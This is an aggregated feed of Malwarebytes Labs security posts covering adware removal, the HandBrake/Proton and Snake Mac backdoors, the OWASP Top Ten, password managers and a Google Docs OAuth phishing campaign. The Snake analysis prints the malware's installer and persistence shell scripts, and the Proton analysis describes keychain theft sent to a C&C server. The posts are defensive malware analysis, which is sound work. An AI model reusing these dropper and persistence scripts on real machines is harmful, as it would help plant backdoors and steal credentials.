  • The last method we will discuss here involves rebooting your computer in Safe Mode with Command Prompt. Doing so will cause Windows to only run the bare necessities and lessen the chance of the user being unable to delete the file. In the Command prompt use this command structure: DEL /F /S /Q /A “{full path to the file, including the extension}”.
  • Sometimes deleting such a file can cause errors which can be avoided by replacing the file with another (legitimate) one. Again you will want to boot into Safe Mode with Command Prompt use this command structure COPY /V /Y “{full path to the legitimate file including the extension}” “{location of the file to be replaced}”

Note that the last part just is the destination folder, there is no need to specify the filename and extension again.

If all of the above do not work for you, you may have to wait for the post that deals with rootkits. See you later. And stay safe out there.

Index Part 1
  • Identify the process
  • Clear browser caches
  • Remove browser extensions
Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers
Part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file
 Up next, part 4
  • Scheduled tasks
  • Services



Pieter Arntz

The post Adware the series, part 3 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 01 – May 07)

Malwarebytes - Mon, 05/08/2017 - 18:00

Last week, we reported about that fake Google Docs app in real time as it wrecks havoc among GMail users worldwide. We also pushed out part 2 of our series on adware. During World Password Day, we highlighted the fact that although using multiple passwords is good, this may be difficult if one cannot manage them efficiently.

As it’s spring in the Northern Hemisphere, we found it appropriate and timely to write up a spring cleaning post.

Lastly, we covered a fair amount of macOS malware, specifically OSX.Dok and Snake. Click those links to check out technical details for each.

OWASP top ten – Boring security that pays off

Below are notable news stories and security-related happenings:

  • Super Free Music Player Is The Latest Malware On Google Play. “Another day, another piece of malware lurking on Google Play, masquerading as a free and helpful app. This time it’s called ‘Super Free Music Player’ and is supposedly a ‘great song app for discovering and listening to trending music’, and contains ‘unlimited free songs from Soundcloud.'” (Source: Help Net Security)
  • Schools Among The Most Sought After Cyber Targets: ESET Report. “What makes these organizations such an inviting target is schools, both those of higher education and local school districts, hold in one place all the types of data prized by hackers, health care information, student and employee personally identifiable information (PII), research and even payment card data, according to a report by ESET researcher Lisa Myers.” (Source: SC Magazine)
  • UK Office Workers ‘Too Trusting’ Of Email Attachments. “More than half (58%) of office workers among 1000 employees surveyed at mid-to-large UK businesses admitted to often opening email attachments from unknown senders, leaving companies open to breaches from documents carrying malicious exploits hidden inside common file-types.” (Source: InfoSecurity Magazine)
  • Criminals Turning To Fraudulent Gift Cards. “Traditionally, gift cards have been a quick way to make stolen credit card numbers pay off quickly. They buy the gift cards online, in bulk, then use the gift cards at their leisure or resell them, without worrying that the credit card number has been canceled — until the charge backs started coming in from the credit card companies and merchants wised up.” (Source: CSO)
  • HideMyAss! Privilege Escalation Flaws Exposed. “A set of serious security flaws in the HideMyAss! proxy service which could place user security and privacy at risk have been publicly disclosed. Over the weekend, Security researcher Han Sahin said that multiple privilege escalation vulnerabilities exist in HideMyAss! Pro VPN for Apple’s OS X operating system, a subscription-based virtual private network (VPN) service used to mask user traffic and online activities.” (Source: ZDNet)
  • 7 Steps To Fight Ransomware. “As ransomware perpetrators continue to hone their skills, we’re seeing a shift to more specific targets. The driver of this shift is the realization that companies, especially larger ones, are much higher-value targets than an average individual and are thus able to pay significantly higher ransoms. This change has elevated the need for companies to strengthen their defensive strategies. Executives must allocate resources and ensure strategies are active against ransomware intent on paralyzing their organization.” (Source: Dark Reading)
  • Fraudsters Draining Accounts With ‘SIM Swaps’ – What To Do. “A new phone can take over your old number because the number is actually tied to your SIM card – in fact, SIM is short for subscriber identity module, a special system-on-a-chip card that securely stores the cryptographic secret that identifies your phone number to the network. You may also need to get a new SIM from your mobile provider if you switch to a phone that requires a differently sized SIM card to the one in your current device.” (Source: Sophos’s Naked Security Blog)
  • Thieves Drain 2fa-protected Bank Accounts By Abusing SS7 Routing Protocol. “The unidentified attackers exploited weaknesses in Signalling System No. 7, a telephony signaling language that more than 800 telecommunications companies around the world use to ensure their networks interoperate. SS7, as the protocol is known, makes it possible for a person in one country to send text messages to someone in another country. It also allows phone calls to go uninterrupted when the caller is traveling on a train.” (Source: Ars Technica)
  • iPhone Phishing Scam Crosses Over Physical Crime. “Last late April a friend of mine had his iPhone stolen in the streets—an unfortunately familiar occurrence in big, metropolitan areas in countries like Brazil. He managed to buy a new one but kept the same number for convenience. Nothing appeared to be out of the ordinary at first—until he realized the thief changed his Facebook password.” (Source: TrendLabs’s Security Intelligence Blog)
  • NYPD: Fraud Ring Recruited Mules Via Social Media. “New York City police are claiming victory after smashing a multi-million-dollar financial fraud ring which is alleged to have recruited participants via enticing social media ads. The authorities have indicted 39 people for their part in a sophisticated operation which resulted in a whopping $2.5m in fraud.” (Source: InfoSecurity Magazine)
  • Europe Pumps Out 50% More Cybercrime Attacks Than US. “Cybercrime attacks launched from Europe reached more than 50 million in the first quarter, double the volume coming out of the US, according to the ThreatMetrix Q1 Cybercrime Report released today. And within Europe, Italy, France, Germany, and the UK accounted for half of all attacks originating out of the region, with the UK and Germany contributing the lion’s share.” (Source: Dark Reading)

Safe surfing, everyone!


The Malwarebytes Labs Team

The post A week in security (May 01 – May 07) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

HandBrake hacked to drop new variant of Proton malware

Malwarebytes - Mon, 05/08/2017 - 17:04

Last year, the Transmission torrent app was hacked not just once, but twice, to install the KeRanger ransomware and, later, the Keydnap backdoor. Now, the same thing has happened to the popular DVD-ripping HandBrake app, which is installing a new variant of the Proton malware.

The real HandBrake 1.0.7 app was replaced with a malicious copy on May 2. This issue was discovered and the malicious app was removed on May 6, also a security warning was posted on the HandBrake website. Both the HandBrake website and the copy of HandBrake available via Homebrew (a command-line software installation system) were affected.

Am I infected?

The security warning provides SHA1 and SHA256 hashes for the malicious HandBrake-1.0.7.dmg file, recommending that you check this against the hash of your download before installing. To do this, enter the following command in the Terminal app (found in the Utilities folder in the Applications folder):

shasum /path/to/HandBrake-1.0.7.dmg

(Of course, be sure to insert the proper path to the .dmg file. Note that you can drag a file onto the Terminal window to insert its path into the command automatically.)

Compare the value returned by this command to the SHA1 hash. If it’s a match, throw that .dmg file in the trash, delete your copy of HandBrake, and scan your Mac with Malwarebytes for Mac. We detect this malware as OSX.Proton.

At this point, you can – in theory – safely download a new copy of HandBrake. I say “in theory” because we don’t know yet how the HandBrake site was hacked and what mitigations have been put in place to prevent future hacks.

If you download a new copy of HandBrake, you can check it against the checksums listed on the HandBrake site to verify that it is valid. However, there’s a big problem with this: If the website has been hacked to replace the legit copy of the software with a bad one, it’s reasonable to assume that the checksums there could be replaced with bad ones as well.

Unfortunately, HandBrake is not code signed, so there’s no real way to verify with 100% certainty that the copy you have has not been tampered with.

Malicious behavior

The malicious copy of HandBrake, when run, will immediately ask for an admin password.

This is not normal for HandBrake, which may tip off a veteran user of the software. However, for a new user, or someone installing an update who isn’t yet familiar with the behavior of that update, this may not raise any red flags.

If you are suspicious and click the Cancel button, it seems that the malware is not installed. Further, in my testing, there were no additional prompts in opening the app after the first. Still, I wouldn’t trust that copy of the app at all, even if it doesn’t appear to be dropping the payload under those conditions.

Unfortunately, checking for updates in the malicious copy does not result in any kind of a warning. When the same thing happened to the Transmission app, the Transmission Project quickly put out an update that would replace the infected app with a clean one, as well as cleaning up any traces of the infection on the system. Hopefully, the same will happen for HandBrake, but at the time of this writing that has not been done yet.

If the password is given, the malicious app will install the malware on the system in the following locations:

~/Library/LaunchAgents/fr.handbrake.activity_agent.plist ~/Library/RenderFiles/

The launch agent runs the activity_agent app at login and keeps it running in the event something terminates it.

However, it seems that this malware may be a bit buggy. On the first install, it also dropped a non-functional launch agent named fr.handbrake.activity_agent.plist-e with some of the contents missing. In another install, the launch agent contained the following non-functional plist data:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" ""> <plist version="1.0"> <dict> <key>KeepAlive</key> <true/> <key>Label</key> <string>P_MBN</string> <key>ProgramArguments</key> <array> <string>P_UPTH</string> </array> <key>RunAtLoad</key> <true/> </dict> </plist>

It appears that the malware installs this .plist template, then uses the Unix sed command to search for and replace the P_MBN and P_UPTH values but fails to do some in some cases. Thus, the malware does not always successfully install.

The fact that the malware requests an admin password yet installs all components in user space where no admin password is needed was initially puzzling, but that password request is actually not a system-generated prompt. It’s a phishing dialog displayed by the malware to obtain your password, which will be sent in clear text to api[DOT]handbrake[DOT]biz, the command & control (C&C) server for this malware.

The malware will create some or all of the following files:

~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/ ~/Library/VideoFrameworks/

These files contain a number of bits of data to be exfiltrated from the machine, such as browser data (including stored form auto-fill data), keychains, and even 1Password vaults. Since the user’s password was phished previously, that can be used to unlock the keychains, and either it or other passwords found in the keychain may be able to unlock other encrypted files. (Pro tip: never store the master password for your password manager in the keychain and make sure it’s a unique, strong password!)

The file is a master archive containing everything in the VideoFrameworks folder. It, too, will be sent to the C&C server, handbrake[DOT]biz, a domain that was just registered on April 29 of this year, presumably in preparation for this attack.

Interestingly, the only two Mac apps ever to be hacked in this manner—Transmission, and now HandBrake—were both originally developed by Eric Petit. Though I don’t know if it means anything at all, it’s certainly a fair question to wonder who has access to both of these projects that could be abused in this manner.

What is Proton?

Many people may never have heard of Proton before. Earlier this year, a signature for Proton was silently added to Apple’s XProtect signatures, but nobody ever saw a copy. Later, Sixgill wrote up findings that revealed Proton was malware up for sale on the dark web.

Proton is a professionally-developed backdoor, which at the time was selling for around 40 BTC (bitcoins), an amount that is currently worth more than $63,000. At that price, unlimited installations were allowed. A single-use license cost around 2 BTC, or more than $3,000.

As an aside, I find it rather ironic that this variant of Proton appears to be a bit buggy, with some installs failing. Hopefully, Proton, Inc’s customers will have similar questions. A little discord among criminals wouldn’t be a bad thing.


This is a general-purpose backdoor with all the usual backdoor functionality. In addition, it appears this malware is exfiltrating the entire keychain, with all passwords. Thus, if you’re infected, the first priority should be changing all your online passwords. (After ensuring that your computer is free of infection, of course! Never change passwords on a device that may still be infected.)

You’ll also want to take any necessary precautions if you have sensitive data that may have been exfiltrated and business users should contact their IT departments if a company Mac is found to be infected.

Seems like this is increasingly becoming something Mac users have to worry about.


Thanks to Amit Serper for analysis that provided some clarifying details about the behavior.

The post HandBrake hacked to drop new variant of Proton malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Snake malware ported from Windows to Mac

Malwarebytes - Fri, 05/05/2017 - 14:00

Snake, also known as Turla and Uroburos, is backdoor malware that has been around and infecting Windows systems since at least 2008. It is thought to be Russian governmental malware and on Windows is highly-sophisticated. It was even seen infecting Linux systems in 2014. Now, it appears to have been ported to Mac.

Fox-IT International wrote about the discovery of a Mac version of Snake on Tuesday. It’s not known at this point how Snake is spread, although the fact that it imitates an Adobe Flash Player installer suggests a not-very-sophisticated method. (I mean, come on, there are other pieces of software out there! Why are the bad guys so hung up on Flash installers?)

Distribution method

The malware was found in a file named Install Adobe Flash The app inside the .zip file would appear to be a legit Adobe Flash Player installer. The app is signed, however, by a certificate issued to an “Addy Symonds” rather than Adobe, but the average user is never going to know that… as long as it’s signed, Apple’s Gatekeeper system will allow it, when set to its default settings.

If the app is opened, it will immediately ask for an admin user password, which is typical behavior for a real Flash installer. If such a password is provided, the behavior continues to be consistent with the real thing.

Proceeding through the installation to the end will display no suspicious behavior and in the end, Flash will actually be installed. This is a significant break from other fake Flash installers, which at best download the real Flash installer and open it separately after proceeding through a completely unconvincing fake install process.

It turns out that this is because the app incorporates a real Flash installer. The app has a rather strange internal structure, lacking the normal structure of an application bundle on macOS. It works, though.

When the app runs, a malicious executable named Install – also code-signed by Addy Symonds – runs first. That process, in turn, executes an included shell script named

#!/bin/sh SCRIPT_DIR=$(dirname "$0") TARGET_PATH=/Library/Scripts TARGET_PATH2=/Library/LaunchDaemons cp -f "${SCRIPT_DIR}/queue" "${TARGET_PATH}/queue" cp -f "${SCRIPT_DIR}/installdp" "${TARGET_PATH}/installdp" cp -f "${SCRIPT_DIR}/" "${TARGET_PATH}/" cp -f "${SCRIPT_DIR}/com.adobe.update" "$TARGET_PATH2/com.adobe.update.plist" "${TARGET_PATH}/" "${SCRIPT_DIR}/Install Adobe Flash Player" exit $RC

This script installs the following components of the malware:

/Library/Scripts/queue /Library/Scripts/installdp /Library/Scripts/ /Library/LaunchDaemons/com.adobe.update.plist

Next, the script opens the shell script then launches the real Install Adobe Flash Player process, which performs the actual installation of Flash. By the time the Flash installer interface appears, the machine is already infected.

The script, which is also run by the installed launch daemon, simply checks to see if the malicious installdp process is running and if it isn’t, launches it.

#!/bin/bash SCRIPT_DIR=$(dirname "$0") FILE="${SCRIPT_DIR}/queue#1" PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'` if [ -z "$PIDS" ]; then ${SCRIPT_DIR}/installdp ${FILE} n fi exit $RC

At this point, once installdp is running, the malware is fully functional, providing a backdoor into the Mac, configured according to the data found in the queue file.


In all, this is one of the sneakier bits of Mac malware lately. Although it’s still “just a Trojan,” it’s a quite convincing one if distributed properly. Although Mac users tend to scoff at Trojans, believing them to be easy to avoid, this is not always the case.

Trojans can be effective even when they’re junk and the social engineering behind them is poor. Consider how bad it would be if someone were to receive this file in a convincing spoofed e-mail, supposedly from their IT department or a close friend, telling them to install it immediately due to a recent Flash vulnerability! As a spear phishing attack, this could be used with devastating effect.

Further, the installed components of the malware are quite effective as well. Few people even know that the /Library/Scripts/ folder exists, so that’s a moderately safe place to dump a payload (although there are better options). The launch daemon is quite unremarkable since anyone with Adobe software will have other Adobe launch agents or daemons installed. The average person won’t know this one isn’t legitimate.

Fortunately, Apple revoked the certificate very quickly, so this particular installer is no further danger unless the user is tricked into downloading it via a method that doesn’t mark it with a quarantine flag (such as via most torrent apps). Malwarebytes for Mac will detect it as OSX.Snake and removal, in this case, is a breeze.

If you’re infected, however, as with any backdoor, it’s important to keep in mind that data may have been stolen, including passwords and any unencrypted files on the hard drive. Keep in mind that, even if you use File Vault, the files are decrypted as long as you’re logged in, so this doesn’t really count.

After removing the malware (and restarting the computer), change your passwords and make sure that you’ve taken any other necessary steps to mitigate damage due to the possibility of exfiltrated data. And, as always, if this is a business machine, contact IT so they know about the issue and can take any necessary measures to mitigate risk to the company.

The post Snake malware ported from Windows to Mac appeared first on Malwarebytes Labs.

Categories: Techie Feeds

OWASP Top Ten – Boring security that pays off

Malwarebytes - Thu, 05/04/2017 - 16:00

There’s a lot of very unique, creative, and devastating cyber threats out there. The first inclination of a defender is to collect news of the new and terrifying and concentrate on network security defenses accordingly. This is completely understandable and mostly wrong. The majority of actual attacks, rather than proofs of concept, use simple and common vulnerabilities that in some cases are decades old. As an example, Facebook and Google recently fell victim to business email compromise. We’ve discussed on the blog previously that this is not much more complicated than standing on a street corner and politely (or impolitely, depending on the company you’re spoofing) asking for money.

OWASP is a group of security professionals who aggregate and publish this second type of vulnerabilities – boring, but very common and very commonly exploited. They recently published a draft list of the top 10 security vulnerabilities of 2017. While intended for developers seeking to code more secure applications, the top 10 list is based on actual survey data of threats seen in the wild and serves as a great starting point for organizations struggling with security priorities. Let’s take a look and see how long they’ve been around prior to publication.

OWASP Beta 2017 Top 10


Injection flaws, such as SQL, OS, XXE, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization. SQL injection was first seen possibly as early as 1998. Detailed info on mitigations can be found here.

Broken authentication and session management

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities (temporarily or permanently). The earliest online reference I could find to a Man in the Middle attack was 2001, but given that cookies were first introduced in 1994, the attack almost certainly has a longer history in the wild.

Cross-site scripting

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user supplied data using a browser API that can create JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. XSS was first discussed by Microsoft engineers in 2001. Mitigations generally include adhering to coding best practices and a robust testing program prior to release.

Broken access control

Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc. This is a vulnerability that predates computers, and will still be seen after the singularity. The easiest patch is to use a robust threat model to determine the least necessary privileges for each user.

Security misconfiguration

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, platform, etc. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date. Again, misconfiguration of security measures predates their application to computers. An auditing and red team program with teeth can assist in programs being appropriately configured before they hit a production network.

Sensitive data exposure

Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser. APT groups have made sensational use of this vulnerability, but so have amateurs working from public data. Including social engineering in red team tests and having defined legal policies in place covering disclosure of company data can diminish exposure.

Insufficient attack protection

The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks. This is a catch-all covering security programs and applications that are ill-conceived, underfunded, or non-existent. Failing here is largely a policy problem.

Cross-site request forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. Such an attack allows the attacker to force a victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. CSRF has been seen referenced as far back as 2001. Like XSS, it can be mitigated by adherence to best practices, in conjunction with security testing.

Using components with known vulnerabilities

Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts. Continuing to use any sort of code with known vulnerabilities is an issue seen almost everywhere, up to and including the US government. This is a very old issue and must generally be patched on the wetware side of the network.

Underprotected APIs

Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities. Testing 3rd party APIs can be difficult, but not impossible. One approach would be to determine the technologies underpinning the API with a site like, and then run pen tests against those technologies.

As you can see, most of these are relatively old and not all require a great deal of difficulty to exploit. What they require is time and attention, along with mature security policies ensuring organizational components work together towards a fix. Unlike arcane APT toolkits, the above vulnerabilities are used indiscriminately. Studies have found up to 65% of observed companies demonstrate exposure to SQL injection, for example. Starting with the old, boring, and extremely effective threats can bring some immediate results to defenders. For more on the top 10, and info on the finalized list when it’s released, check out


William Tsing

The post OWASP Top Ten – Boring security that pays off appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Why you don’t need 27 different passwords

Malwarebytes - Thu, 05/04/2017 - 14:00

Passwords. The bane of modern existence. To celebrate this nuisance, the holiday gods have given us World Password Day, where thousands of people come together online and pledge to improve their password habits. How many of those pledges do you think stick? According to the 2017 Verizon Data Breach Investigation Report, not many. A little over 50 percent of all breaches in the last year leveraged either stolen or weak passwords.

Coincidentally, today is also Star Wars Day (May the 4th Be with You). And while we all wouldn’t mind having a lovable droid guard our passwords as loyally as R2D2 guarded the blueprints for the Death Star, the reality is we’ve got to do the guarding ourselves. And that has become burdensome enough to send Yoda himself over to the Dark Side.

Current state of affairs

According to a poll by Intel Security, the average person has 27 discrete online logins. From social media accounts to banking to online shopping to utilities, credentials—which usually include a username and password—are required for each. And if people are practicing good password hygiene, they’re engaging in the following recommended practices:

  • DO: Use a different password for each account.
  • DO: Use a long password. In fact, the longer, the better.
  • DO: Use special characters, numbers, and capital letters.
  • DO: Change your passwords every couple of months.
  • DO NOT: Write down your password, whether that’s on a piece of paper or stored electronically.
  • DO NOT: Share passwords via text, email, or chat.
  • DO NOT: Use easily identifiable information, such as a birthday or a child’s name.
  • DO NOT: Use an incredibly generic password such as 12345. (That’s the combination an idiot would use on his luggage.)

All of this, for 27 different logins, is simply unmanageable. In fact, the Intel study found that 37 percent of its respondents forgot a password at least once a week. And people are so sick of juggling dozens of different passwords, that 20 percent said they would give up ESPN if it meant never having to remember another one. Six percent said they’d give up pizza. PIZZA.

This level of discontent and security fatigue means that very likely, most users are falling back on bad habits: writing passwords down in a notebook or a Google sheet, for example, or using the same password across multiple logins. (A study by the National Institute of Standards and Technology confirms this: 91 percent of its respondents admitted to reusing passwords.)

So this is why we say: stop it. Stop the bad habits, yes, but stop the “good” ones, too. Having 27 different passwords that are lengthy and full of characters and numbers and need to be changed every few months and can’t be written down—you’d need the memory of an eidetic elephant to keep up. Online services will only multiply, so what should you do?

It’s very simple. Get a password manager.

Password manager 101

For those who might not be familiar, password managers assist in generating, storing, and retrieving passwords from an encrypted database. They typically require that users create and remember one master password to rule them all. One master password to find them. One master password to bring them all, and in the darkness bind them.

One master password to stand at the precipice and shout gallantly, “YOU SHALL NOT PASS!”

Sorry, it couldn’t be helped. As we were saying. Generally, most password managers work the same way. You’ll be asked to create a strong master password during setup (and here’s where you’ll use those password best practices, such as generating a long passphrase with numbers and capitals that steers away from guessable personal info). From there, you’ll add your other credentials to the password manager either manually or through tools that can automatically find and upload passwords for you.

While most password managers have similar setups, they secure passwords in different ways. Web-based password managers store your passwords encrypted in the cloud. Some are built into browsers, such as Safari, Firefox, and Chrome. Others may store your passwords locally in an encrypted file on your computer, tablet, or phone.

In addition, some password managers have features that help you audit your credentials, allowing you to weed out duplicate login info and remove sites you don’t use, or alerting you to breaches that have happened to the companies you log into. Many have customizations that allow increased security, such as regional lockout and two-factor authentication (which we highly recommend taking advantage of).

But aren’t I just asking to be hacked by storing everything in one place?

While some folks might be wary of using a single point of access for all their sites, remember that password managers still use your individual passwords to log in to your accounts. Those passwords are locked in an encrypted database, which is way more secure than a post-it on your office desk or a faulty memory. Ask yourself this: is it safer to store all your money in one bank or to hide it in piles underneath several mattresses?

As for fear of password managers being breached—sure, it’s possible. In fact, it’s already happened, as was the case in 2015 when LastPass was breached. However, even though cybercriminals got their hands on some email addresses, they were unable to crack master passwords. This is because master passwords are protected with military-grade security, hidden behind thousands of rounds of hashing, or algorithms that convert strings of text into longer strings of text. So far, no reputable password manager has leaked consumer master passwords (that we know of).

So which password manager should I use?

The following password managers come highly recommended by our staff and tech reviewers from The New York Times, Lifehacker, and PCMag:

If you don’t trust third-party apps with all of your personal information, you can try an open-source password manager such as KeePassX, though it requires a fair bit of technical know-how to set up.

I am absolutely opposed to a password manager. What else can I do?

While we stand by our recommendation to use password managers, we understand the urge to reject placing all your trust in the hands of another company. So here are a few alternate methods for choosing more secure passwords than the random hodgepodge you’re likely working with now.

  1. Split up your online services into major groups, such as bills, entertainment, shopping, and social media. Assign a single password to each group according to a theme. For example, you could choose movies as your theme and assign quotes from one movie to one group, or character names from a second movie to the second group. Rotate these passwords every 90 days by incrementally adding a number or changing a character. This requires a lot more effort but is still preferable to using the same password across all accounts or having to reset forgotten passwords every week.
  2. Choose one semi-difficult password for all accounts but insert a naming convention in the middle of the password to denote which account you are signing into. For example, if your password is L3tme1npleaz, your Gmail password could be L3tme1nGMAILpleaz. Your Amazon password could be L3tme1nAMAZONpleaz, and so on and so forth.
  3. When possible, choose a service that has two-factor authentication over one that does not. More than 150 applications currently implement two-factor authentication. You can check them out here.

Passwords don’t have to rule your life. You can lock them up behind a password manager and worry about remembering a single, slightly complex phrase instead of 27. You can relax knowing how well guarded your passwords are. And you can go ahead and burn that secret list of passwords you keep in your address book even though you’re not supposed to.

Do you have a favorite password manager? Or a method for creating and remembering unique passwords? Let us know in the comments below.

The post Why you don’t need 27 different passwords appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Google Docs App spam goes phishing

Malwarebytes - Wed, 05/03/2017 - 19:51

There’s a very clever phishing scam going around at the moment – originally thought to be targeting journalists given the sheer number of them mentioning it on their Twitter feeds, it’s also been slinging its way across unrelated mailboxes – from orgs to schools/campuses. This doesn’t mean it didn’t begin with a popped journo mailbox and spread its way out from there or that someone didn’t intentionally send it to a number of journalists of course – but either way, this one has gone viral and not in a “look at the cute cat pic” fashion.

Here’s how it happens

The potential victim receives an email claiming to be from a Mailnator account, which they dispute is related to their service.

The email reads as follows:

Title: [Contact] has shared a document on Google Docs with you

Body: [Contact] has invited you to view the following document

Hitting the Google-styled “Open in Docs” button takes the clicker to a genuine Google sign-in page, which is sure to wrong-foot many people:

Where this all goes wrong is on the next page, which is where the victim actually gives the app permission to access the account via OAuth. Somehow, nobody at Google thought of preventing people from calling their apps “Google Docs”.

Google Docs would like to

Read, send, delete and manage your email

Manage your contacts

After “Allow” is hit, the spam is then sent on to contacts. While 2FA would normally save you from a phishing attempt, in this case, the victim is willingly giving permission to the app so 2FA won’t help – the only solution is to see which apps have been granted permission and revoke.

Here are some of the domains being used for this (all offline at the time of writing, but there may be others):

Phish domains:

— Andre M. DiMino (@sempersecurus) May 3, 2017

Google is aware of the situation and is currently working on it. Meanwhile, Cloudflare leapt into action very quickly. We’ll update the post with more information as it comes in.

Christopher Boyd (Thanks to DioDesign and hrbrmstr for screens/data)

The post Google Docs App spam goes phishing appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Adware the series, part 2

Malwarebytes - Wed, 05/03/2017 - 15:00

In this post, we will be using the flowchart below to follow the process of determining which adware we are dealing with. Our objective is to give you an idea of how many different types of adware are around for Windows systems. Though most are classified as PUPs, you will also see the occasional Trojan or rootkit, especially for the types that are more difficult to detect and remove.

Reroute and intercept

We will discuss a few methods to reroute, intercept, and change your internet traffic. They are:

  • Proxies, using a third party server between the machine and the internet.
  • LSP hijacks, inserting a third party file into the winsock.
  • DNS hijacks, connecting to another site by altering the Domain Name System results.


If a system-wide proxy on a Windows computer is set, you will almost always find it in the Microsoft browser. In Internet Explorer, you can find it under Menu (gear icon) > Internet Options > on the Connections tab click the LAN settings button:

Remove the tick under Proxy server to remediate the problem.

In Edge, in the Menu (three dots) select Settings > View Advanced Settings > Open proxy settings > Turn Use a proxy server to Off to disable the proxy.

Browser specific proxies are rare, but I wanted to list the options to change the proxy in your favorite browser anyway.

For Chrome:
  • Click the menu icon
  • Choose Settings (alternatively paste chrome://settings/ into your address bar)
  • Click on Show advanced settings…
  • In the “Network” Section, click Change Proxy Settings. This will open the Internet Properties window, where you can access the LAN Settings as shown above.
For Firefox:
  • Click the menu icon
  • Choose Options
  • Select the Advanced tab (alternatively paste about:preferences#advanced into your address bar)
  • Select the Network tab
  • Under Connection click on Settings and you will see the proxy configuration options

For Opera:
  • Open the menu
  • Choose Settings
  • Open the Browser tab
  • Under Network click the Change proxy settings… button
  • This will open the Internet Properties window, where you can access the LAN Settings as shown earlier.

If you notice that the proxy is running through a port on your localhost (, there is a way to find out which process is responsible. Using the command netstat –ab in a command prompt (elevated as an Administrator) will reveal which process is listening on the port (8003 in our example below).

BetterAds adware having control over port 8003

LSP hijackers

A Layered Service Provider (LSP) is a file (usually a DLL) using the Winsock API to insert itself into the TCP/IP stack. There it can intercept, filter, and modify all the traffic between the internet and a system’s applications. LSPs are stacked parts of the Windows Sockets API (Winsock 2). The layering order of all providers is kept in the Winsock Catalog. As a consequence, LSPs have to be uninstalled. Just ripping out the file that acts as the LSP could result in a broken internet connection. If Malwarebytes removes an LSP hijacker from your system it will require a reboot to prevent this disconnection from happening.

DNS hijacks

Domain Name Service (DNS) hijacks can be performed at many levels, but in the scope of this series, we will only deal with the ones that act on the system itself.

(a) DNS cache poisoning

By feeding your DNS resolving process false data (in such a case, the wrong IP for a certain domain), the system will at some point no longer query the DNS server for the IP but use the wrong data it has in his cache.

Remediation: To clear the Windows DNS cache use the command ipconfig /flushdns in an elevated command prompt.

(b) Hosts file hijacks

The hosts file is a special file located in %windir%\System32\drivers\etc that can be used to store IP addresses that you want to associate with certain domains. This can be used to block advertisements and malicious sites or to map out a local intranet. Adware sometimes uses hosts file of their own making to replace the one on the victim’s system to hijack traffic.

Remediation: You can edit the hosts file in notepad (elevated). Even though it has no extension it is a text file.

(c) DNS server settings

The DNS server settings are normally stored under the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters in the NameServer value which should hold two comma-separated IP addresses that represent the DNS servers for the internet connection that is currently in use.

Remediation: Change the DNS servers for the active internet connection by looking at the properties of the connection in the “Network and Sharing Center”.

For most ISPs this is the recommended setting. If yours are different you may find the necessary information on the provider’s site.

Index Part 1:
  • Identify the process
  • Clear browser caches
  • Remove browser extensions
Part 2
  • Proxies
  • Winsock hijackers
  • DNS hijackers
Up next, part 3
  • Type of software
  • Uninstall
  • Remove file
  • Replace file


Pieter Arntz

The post Adware the series, part 2 appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds